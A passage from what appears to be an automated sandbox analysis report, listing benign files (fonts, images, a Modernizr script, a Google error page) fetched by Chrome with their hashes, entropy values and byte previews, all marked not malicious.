                                              Entropy (8bit):4.896633254731508
                                              Encrypted:false
                                              SSDEEP:12:Uc11FP/sO6ZRoT6pHAciJkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKuJXYmOOk4TfenEPCD
                                              MD5:71D6A57D21337114032CA39B294F3591
                                              SHA1:ADA1D867672276F16EF4D3B8A46A519FBA8E3D4E
                                              SHA-256:36B2057EB5EEF261A2CBB8C149DCF3A11EDAA15CCD8E3D462EB34999F5FF8F2A
                                              SHA-512:BC5F5B55C2741FED993D5D25A36030028C388C8888EA2D1D1F24970AEC4F856CDA366940B99D54FF2D4D9AF16DF8DE39AB847A7BA2BE0B649DE1CE2C9E70A330
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.googleapis.com/icon?family=Material+Icons
                                              Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 68x68, components 3
                                              Category:downloaded
                                              Size (bytes):2651
                                              Entropy (8bit):7.811950005998033
                                              Encrypted:false
                                              SSDEEP:48:+pcsu5e9wuWP8xX3M4xuQIc4G4nDzviQSGmw8i/CpqfRYK8tjveuvCKQMTlwGxn:+Gs9wG9MQIc4G4nDz6pw8iluReuvFTl/
                                              MD5:447FA3A5638525CD6DDD5CF263ADF48C
                                              SHA1:D807B90FD4994058E15845882A2842BBC1A05E05
                                              SHA-256:48AE8E4C2870B04947366E1D17AEE9BA104A76B20732B1E6E5F6A655C7E869B5
                                              SHA-512:2987B663AE9488EE0DF2913DE9833F92F7E889508FB354AC0955C9A8C636C4F641024B88967D229F9504DCD5785512A6DCABA45012B1B7A755DA21D3CFE6F28A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://yt3.ggpht.com/kX-vYQ9Gn6TcX7ke5nWkheWbQUMzZEQn1dyzA-bRdJ3yC6h_jbggZ0PleqthkW2AGlTADqSrSg=s68-c-k-c0x00ffffff-no-rj
                                              Preview:......JFIF......................................................................................................................................................D.D............................................B..............................!.124ARTUt......."Qq..5r...#$&BDa...................................B...........................!1AQS....34RTars........bq....25.."B.............?.j.J.....ROP.u.C...5.+..nG.1{...]..F.YqLf..:..nG.1{...mfQ..)....R;-.../z.<-..4..1..T.Ge.....S..F...3O.H.#..|.(...i.S....~S..O...e.R..?.u-...(r..#f'@."3...@.O..DF......,....e...X..Toy].>.7...#.N..v.7..K...a.N.XO..G.~...1.`..DH.. ...[..o.z.#`.K...t......a`.-...(.5.A..X7 Kk.GJ:.o.z..........[.....r....t.[..h.u..(..[.....c..{@..P..+......p..C~c.e..\8....-..).....rw4.+.....X~ .=..........H.....b*R0D`....+S.....S.kc.....;.V..o.g:6..&.1.W.....j}.o.&$G..=..Do.~...%...%..$.......c.D.......!:1..@.E:..7DsX.&........JV~...4...:.H.p....C@.Y..++.o...W.]..y.D..s..B:.0.L..=BF.2i.......j..(..@*..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):15204
                                              Entropy (8bit):7.6852931209739745
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw5YN/ATLTQYCsm5hv18fMA7ieKM5vnhQJGzLwlWIKlk:4YNg75YNeLMsm57QMNMdnhQJKwgBi
                                              MD5:4ABF4A44DEA0A91D6462B2851191B031
                                              SHA1:54762184DA090AF36CACCD0C4C94F349900C7BBE
                                              SHA-256:D43355E3AC32F88FE68780C2D51BF07ED28216E584F02C64BDBBC700BA0CB044
                                              SHA-512:862FBDCBC6FCA391CFD4FB4CB09D95C8261D73713408E248E13B7F543F139B4048D20B8481EBB23EE78B86A71E7A07A26935D075330A1A307769AFC0FF7E106A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/39/b98bea2f5aa38986a63def4cfb9af12e.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):145835
                                              Entropy (8bit):7.975888211635867
                                              Encrypted:false
                                              SSDEEP:3072:o2wGVPKPW31v2s7KIE10DnLKCT/R04nd7AoSP03p1yT339:o2XVPV3ws7DO0DWCLLndsi1O339
                                              MD5:3D870480DFF2F571AADDAA4D3CD0930C
                                              SHA1:D2371E68D9DF1D4E7D9A39E53DD7CA81CC4C1BEA
                                              SHA-256:907CCBBA3C06E85A96777D103505482869D57FA39B16B27331AC62F9746B3D1C
                                              SHA-512:BAE786AA5F5436F191A33CC9A020367D8C7CF8DD1A7011BBFDE9E7C9C4521886B154D391B8DD5FCE4EA196617BE7F84B95A68D6CFD41CC41BC907FC60673FE77
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:A20F4146934111ED86EA9DB4A8B2FF29" xmpMM:DocumentID="xmp.did:A20F4147934111ED86EA9DB4A8B2FF29"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A20F4144934111ED86EA9DB4A8B2FF29" stRef:documentID="xmp.did:A20F4145934111ED86EA9DB4A8B2FF29"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............Ne...{..9...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):4113
                                              Entropy (8bit):5.075860992877331
                                              Encrypted:false
                                              SSDEEP:48:ccR50vARZ3im8MWl7NNVAS1m+q20NDFHSqqY+CJqwyLNXX:EySm8PN77gDFx+CJRCNH
                                              MD5:33124730D578A560BC14DB423F651909
                                              SHA1:6F68086460D5C8796F0583537A77E41A1A37B004
                                              SHA-256:BD5A07A339BBB0C59C18BDACC448A133AE6BD92A381B2A25C94C8BFA7BD68001
                                              SHA-512:EEEA199998D9F8E4C8E3448E8718E3BE26653421F7E12CC31C3B82186EE3848AAB5B4894E3FEE0B3C5300FE4C5528D6794AA9406D4419B8E27E81D056E7F8C99
                                              Malicious:false
                                              Reputation:low
                                              Preview:[{"id":"vuwtuwvwtwuuwvw","zrange":[15,15],"layer":"spotlit"},{"id":"vuwtuwvwtwuuwvw","base":[1403470848,918354944],"zrange":[15,15],"layer":"m@707457653","features":[{"id":"4502866564103614152","a":[0,0],"bb":[-14,-7,15,8,-9,4,9,19,-15,15,15,30,-11,26,12,41],"c":"{\"1\":{\"title\":\"......... ...... ......... .....\"}}"},{"id":"2775180758760152124","a":[29440,512,1403500288,918355456,1403500288,918355456],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2],"c":"{\"1\":{\"title\":\"........\"}}","io":[0,-13]},{"id":"10574375220758496514","a":[2304,26112,1403473152,918381056,1403473152,918381056],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-118,-27,-10,-9,-88,-13,-10,2],"c":"{\"1\":{\"title\":\"..... .......\"}}","io":[0,-13]},{"id":"9052388106036731616","a":[23296,9984,1403494144,918364928,1403494144,918364928],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2],"c":"{\"1\":{\"title\":\"....... ... .......\"}}","io":[0,-13]},{"id":"
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3155
                                              Entropy (8bit):7.911862254778413
                                              Encrypted:false
                                              SSDEEP:96:KsNXqXXe8gYj7nappMY0a9+7H/i6Tu/BQfbFX8l:KAqDgY3a339CHT6ot8l
                                              MD5:927B5D70D5561962F1CB99D16DFBFDEA
                                              SHA1:CCFF22FB7F4BE3C4889BB6B2B04E5D8D0AD2D786
                                              SHA-256:6F5A8822F51DF2BBAB7F10632D9A678E82155751D2972FEFC1C6681224886B17
                                              SHA-512:A83544FE8244576EFC7C7C0B420FB717ECF7A61D6D2F96670A94B330D979AB3CD253DDE894A4F9BC61632C540EE7345F360F9A3C4D9D0FE4CE94EFA55C8F717B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....A67.N....!........C84.SB..G..;..B......?52.X...8.V....G;......1.W).N...B.....:.Q.........@.....<......?1-.M;.UI~..!..D-J...<.....;1..........D<.I3.......3,....>..C6.g!.%+...I......>A........!....)".e^+.F...yo....QK;|...........<2...M.......L.d......,._......7$....xw...../..A.K.6H..v..?...7w.gi.~......G.7.`..+.,.1.k.<d.....QJ]o...V~Z...L.:.Fi.PS........}~........@U.......&.n...:U.#.....IDATh...W........!...HT ..e.y.A.....p.u^...v.........$.^.o.].H8.|.p.>....~./.....gX?..8.......1.......(@Q...........".ax.....T.y..x.....p....(...UX.W-D]..O.(....).$.g..j.@..$....Q._s...p~..I...:.......A.T....Dp..i.".p..yi{~mm...~%..3... ^Z.;.*,B.......Y.Z_l$....[u...5...Sx.x.........AUA.M...........VW..eI.......a4i.......J..d......zr...Y4y<......$..+....h.(.tz.p.....\.U.5...4.....@.s..8D.kR..E.........n..[A.......1..;H..nQ.....yH...g$.......;j.K..l.@..JPy}..1. .gu.^.C...(..m..>..vw.b...W...sH.Z.X.; ...|..JA.w...pP...t..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (23699)
                                              Category:dropped
                                              Size (bytes):250764
                                              Entropy (8bit):5.304884774416847
                                              Encrypted:false
                                              SSDEEP:6144:Y4Y3yAyTI+bKlfno3Cq48a5LwsS4dkakd4dTb:Y4Y3yAyuok8a5
                                              MD5:3FEADD2E63DB755357A52A262275BF49
                                              SHA1:8E1C1CDE4E57C14131D9158D0A0A5D921C3C3865
                                              SHA-256:CC8BFF327A1DD8B167D9829A427E5FFC428C6F008A3612B8905F86F70D59431D
                                              SHA-512:7FECEBB62C52DA5E73CC7348227B4435DF1DF6206E7AC212194C5F3BEEBC573130832F99584BB67DE51FB7D39D04805599C0BB96EAA41BBC52ABE5DDD6E7DC6F
                                              Malicious:false
                                              Reputation:low
                                              Preview:;window.Modernizr=function(a,b,c){function x(a){j.cssText=a}function y(a,b){return x(prefixes.join(a+";")+(b||""))}function z(a,b){return typeof a===b}function A(a,b){return!!~(""+a).indexOf(b)}function B(a,b){for(var d in a){var e=a[d];if(!A(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function C(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:z(f,"function")?f.bind(d||b):f}return!1}function D(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+n.join(d+" ")+d).split(" ");return z(b,"string")||z(b,"undefined")?B(e,b):(e=(a+" "+o.join(d+" ")+d).split(" "),C(e,b,c))}var d="2.6.2",e={},f=!0,g=b.documentElement,h="modernizr",i=b.createElement(h),j=i.style,k,l={}.toString,m="Webkit Moz O ms",n=m.split(" "),o=m.toLowerCase().split(" "),p={},q={},r={},s=[],t=s.slice,u,v={}.hasOwnProperty,w;!z(v,"undefined")&&!z(v.call,"undefined")?w=function(a,b){return v.call(a,b)}:w=function(a,b){return b in a&&z(a.constructor.prototype[b],"undefined")},Function.prototype.bind||(F
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=3, software=Adobe Photoshop Lightroom 6.7 (Windows), datetime=2020:02:09 17:53:12], baseline, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):186098
                                              Entropy (8bit):7.90756826038093
                                              Encrypted:false
                                              SSDEEP:3072:pbDb8615llrNXsyIh0a5Qf7yJZeBoNFElpb3fJ8W3gw05a1xL3:9Xz5TNXsyIh/5zbsbB8Kgw05SxL3
                                              MD5:0B4916AD93ECE7CF236B3A0E3D691A67
                                              SHA1:1C59F75F9CFFC2E7E75282440B2F86BB5F256A30
                                              SHA-256:63642C76B1CF73C04DD54C6AB0F9678C27F223EB0DA5E2F274C4023892472879
                                              SHA-512:0D16132C76C75A0A8C382ABA1A0FAE134D77EC5CE3D29137974B3F252C0EB2AF00445DF19AECCC2D9111943D58EF5D2CCFD56F9AA94B88E3F4DCDCDF0526B060
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF............(FExif..MM.*.................V...........^.(...........1.....(...f.2...........i.................;.......;....Adobe Photoshop Lightroom 6.7 (Windows).2020:02:09 17:53:12...........0230.........................................................(..................... ..........'........H.......H................................................................................................................................................. ....Adobe.d......................................................................................................!..1AQ"2aq.B.....Rb...#Cr......$3......&7Sce.........................!1A.Qq"3a2.#b..4BR................?.R....`.X...2@...$.. .H...d.. &H...d.. &H...d.9 .H....! .$...B.0X..$0X......R=..R.......".).2@...$...2@L..$...2@L..$...2@...$.....L..%.w<.A'."-..d....c56-,S.......h.Y.?.h......]...-..s.p..{.{{Ld....i..{..vvu....6.....7.._O..._.3st..3.UAc[0..! .$.... ?...)...)H.R...R..$...2@...d.. .H...d.. &H...d.. .U4..T....UA'
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12265
                                              Entropy (8bit):7.591221960010426
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwvZBz5onzkQ8sZDSIjMXZ95EfVVyqzlApeJ:4YNg7vZB/sdZjMv5+VyMlAc
                                              MD5:06E6B05DC75A72F2CF70F2654B4FE8A2
                                              SHA1:C964A1D78A68C30E756C10CD74A1F0ABBAD1F03F
                                              SHA-256:BDAFF245677B12896DCB29900F3BEA263B8991FAB4BA254BFE80C5CAB151CEF4
                                              SHA-512:F60799BD9E0772D3F2C133FB1D92E37314819BAB100DF9DC5EE8619B7394B4439741007DCDD88D72514DE95747BC8E9CEB9EBAEA65878054F4DE98989E206052
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                              Category:downloaded
                                              Size (bytes):15552
                                              Entropy (8bit):7.983966851275127
                                              Encrypted:false
                                              SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                              MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                              SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                              SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                              SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                              Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):56086
                                              Entropy (8bit):7.996338554799032
                                              Encrypted:true
                                              SSDEEP:768:1Y/CIe8scZ4z0csAMkBvXAbjn0FJ9bfXFOBEJi2N8y1hRTlWN8kwsbUBXaZO5wdL:1yCIeyaATSvXG0j5XFFvxRoNjw3Bf5U
                                              MD5:8BD7D6680E592EF3E7C1EDAC039D4C92
                                              SHA1:78452650B9CD6F465491FFC98E69BFAA791764B0
                                              SHA-256:AEA8ADAFDA82B886FF957E10591AEC80DC957EA9D4F18B045D66536F10FDBD56
                                              SHA-512:06D0010975C984FB13B965F83E87EEF686D41B62FD6C2213EE734E4F97C29305985B9193401489CCE6E9FEFE40019227EA248E76DB92F5189B0C85AA7DD595ED
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/30/d32187d7377ba8b456ad17d703a1f7c9.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 .....!...*....>.p.S)&=.$2.c...gm.._........B......F]|.|c.5.....&.~,.]I.M...W.......[.S./........w.:O.v..c....Z..h.R.GN............../....../.?....g.~3.+...................> ...OA.z.#..>..h............7.O._......V%._..&i..Q.3...Q.T..=..vD7.S..C......./...C.v...B.ie....n2*....%&.I..........SJ...#+,B.?.V?..(-'.E..G2]...,....`...1......s.SR...;...g..P..{na%[.0....J2@.A>....T.-R2<f..{.k.S..{... .#....o..I...j..h.Sn../A.......i.<....!.E....k...\.4z.o..q...l...G.@.I.2.4._.y...}....V......./.. ?..X...."M.Z.z.t &^e#d.;..]^X..@b.B(.o.....o.G..q....#..K..|M<6...e...........P.P.x].*...#C......cU8@..*.o@K.:../.....A'..I.#W...Ae......*.R;.......!./.y.N..T`.l......<J.......TEro:..C.. ...YnX....N0A...P.EQ..k....N..M.......bX.s......|.<Z.7p.XY.-i$>.dv..t..../4.L.^9f....e..........a..m+.X...r..w'.......<.u.^...,k.B.cu.":.7.6.8...x?.E....n...q..{.......*.........U..x.x..K=.M-......)*.:...........4...-A.....6...."..._.I.#.5.x973...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2621
                                              Entropy (8bit):7.918229726606788
                                              Encrypted:false
                                              SSDEEP:48:jLD+cWlTpLUPQuPvvxIYhG9Ocyf8e4EPxog4ANaiaR4jY7sAz9tvS0SNV0:jLDDWlTpI44xZ8O735pNaiaRL4Az95G2
                                              MD5:F64551A274EA5AD34999C942DAC2235B
                                              SHA1:6ED748D962A008CD5CDA1E0D64B1C0531EC06400
                                              SHA-256:6DA0B9CEF2E9280C500C05F13EE7C2F5343F27DCB25CABE7786BBF9BC5671700
                                              SHA-512:44ADAC63E7C791F24520A222AA06F3AFCE46B54FBCFDDE480FCB658703AF8A7AEEAE66C9CBE981DFC8D79BF80171454CABE58C73F1BA3A02E207796FC8935AF0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/cloud.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...cPLTE...................er.............\j.......al..............................|..nz..................!.....IDATh.Z...*.......;...w. .(..}N.eX.{../..x....}(,..O]...d..D......42...0.?b..e...;}0.c....G.m.........K..._Q.....\.....(.M......O....P....`.Q.f..@.`..eI..[..?F.eY......V..:b.-F...K).JH......v..#,...6]U}UA.X.L...[FX.y~..H.Z..6D,..?.n.Z!...y.d..Byk_z.1US......S0..D./..&..#.O.... x.Y.SAV.$u..{<A3..^'...........j..1JgB...#.zP.....j&n......s.O.`?....o.....s;..E.T..%..d@a...3H+..ba..8......8.\..?.8.Gk.X..R....0.p...X...*..u.M u..z..+^..&.....re..g.).W.....\..y.U.......e.z/... j......m.[1..<..$A.....F..T.zH.9...@.D7.;...B...P,$....z..+...$(O)...&.. PI.`r.NR.>...eolV.Z&24..)l,.2D....h...E...0./.N:....&5.Z.,....J....I.....L..=-....J..(...c.1r...<..!.U.!..7.S. .J.r.v..!...+..P..T.. .......~H...P.......%J../.:.......(.........8I........k.e.(....F.k.v.q.K....5sO.a>..DS.Vr..u.WK-.....H..@...H.0!B...\.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                              Category:dropped
                                              Size (bytes):1609
                                              Entropy (8bit):5.268171846580519
                                              Encrypted:false
                                              SSDEEP:24:hY6sv7zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5zF5cUehk2:3q3+pUAew85zvc/hk2
                                              MD5:20D444971B8254AC39C8145D99D6CA4C
                                              SHA1:72E41F2A340F4A6E3A748CB57D293631390B733A
                                              SHA-256:A04F41837D317573EA61EA29ABBA7C4FF4E38C9177DA68F4706B9C13921A8D82
                                              SHA-512:BEA16497D014481EE10EB80A129846B7B184AB1ECA242FA38B84255C6461C748A62F1BD6C15D1807F8B5E926E550C30AB47F8A40AE43BE229E6AB857C4EA6F6F
                                              Malicious:false
                                              Reputation:low
                                              Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 405 (Method Not Allowed)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:u
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):6598
                                              Entropy (8bit):4.377993081789527
                                              Encrypted:false
                                              SSDEEP:96:UGyFnVFouNtS896k15Cg7+7zqREwSopLggyJ24jKcbc7s+aB983yoof:UGyD3NZ/tEMSiKs4M4+K983E
                                              MD5:8106487DB88358D45257B316DC1BD282
                                              SHA1:8A1023384BBF1D0823B75E50861385416A8313E0
                                              SHA-256:F34EBEB66A9BC2E7B5B5D0D7181B1A54521AB537ED6291312E8BD1DB8653A203
                                              SHA-512:C604EFD5C13526F968FB1E1F5F9A5A87F1B1BA1A9E33469D4971CBD6085C33C28717BB7563FAF17638FBC6C03AFE06A5D2CD35CC4276D379B10EAC5367E945E9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/hero/4/Group%203.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="116" height="116" viewBox="0 0 116 116">. <g id="Group_3" data-name="Group 3" transform="translate(-999.92 -1370.92)">. <path id="User" d="M23.168,0A23.168,23.168,0,1,1,0,23.168,23.168,23.168,0,0,1,23.168,0Z" transform="translate(1034.752 1405.752)"/>. <g id="Move" transform="translate(1000 1371)">. <path id="Inactive" d="M58,116a58.426,58.426,0,0,1-11.689-1.178,57.683,57.683,0,0,1-20.739-8.727A58.17,58.17,0,0,1,4.558,80.576a57.715,57.715,0,0,1-3.38-10.887,58.569,58.569,0,0,1,0-23.378A57.683,57.683,0,0,1,9.906,25.572,58.169,58.169,0,0,1,35.424,4.558a57.722,57.722,0,0,1,10.887-3.38,58.569,58.569,0,0,1,23.378,0A57.683,57.683,0,0,1,90.428,9.905a58.169,58.169,0,0,1,21.014,25.518,57.706,57.706,0,0,1,3.38,10.887,58.563,58.563,0,0,1,0,23.378,57.683,57.683,0,0,1-8.727,20.739,58.168,58.168,0,0,1-25.518,21.014,57.708,57.708,0,0,1-10.887,3.38A58.428,58.428,0,0,1,58,116ZM58,7.734A50.642,50.642,0,0,0,47.87,8.755,49.991,49.991,0,0,0,29.9,16.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):164
                                              Entropy (8bit):5.141463399874234
                                              Encrypted:false
                                              SSDEEP:3:fmH4cndk18CukmBhHI2pdHniouYdcq3HsXEnkcP2oiCq2T7Nrkkn:YtY8nphooioPR3Nn22q25rkk
                                              MD5:BB58CFE0BC4943B8A29F627E93C63273
                                              SHA1:3C87848857A9DB3F1FE0F90F5DFB2BCD797184B4
                                              SHA-256:0F4A0AADA717DF7628BADAA62B4971E11A41DC0408A41F08576A4C8EF59AB35B
                                              SHA-512:03D5343B27DA699CA0EB7284A1562DCFEA8CAC4654CCA3835E83CD69149763E58E5DE97CE58502B4D9F4C300A3E32D11379E8C9FFC4F36B0A48474ECF6B9D956
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwmh1RaZnKR_bhIFDZRU-s8SBQ2DqFs9EgUNEg_8ahIFDZIFVM4SBQ3GaLD8EgUNuyuv4hIsCcqpGLNA26kuEgUNvTVvGRIFDYOoWz0SBQ0SD_xqEgUNSUCvSRIFDcZosPw=?alt=proto
                                              Preview:Cj4KCw2UVPrPGgQIBxgBCgcNg6hbPRoACgsNEg/8ahoECA0YAQoHDZIFVM4aAAoHDcZosPwaAAoHDbsrr+IaAAo5CgsNvTVvGRoECAcYAQoLDYOoWz0aBAgJGAEKCw0SD/xqGgQIDRgBCgcNSUCvSRoACgcNxmiw/BoA
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):11726
                                              Entropy (8bit):7.951180892939952
                                              Encrypted:false
                                              SSDEEP:192:ZIIHUCD4watTGcbgGegLg4oVDrOcKYmSfUKp6DHQDr+j/MfaRYw855ZbtxQPSV0:f0woTBb6Mox6cKYZVMH7ED59tfe
                                              MD5:93E4CB95B27FDD854669D7BDBE93BC05
                                              SHA1:2D59242B05678C4FFE5775FE79989E2DF1A89C8C
                                              SHA-256:D5ACB2B6D850E275D761335125AE99E1193CA91095E88EC2DA36099E03EB2B5E
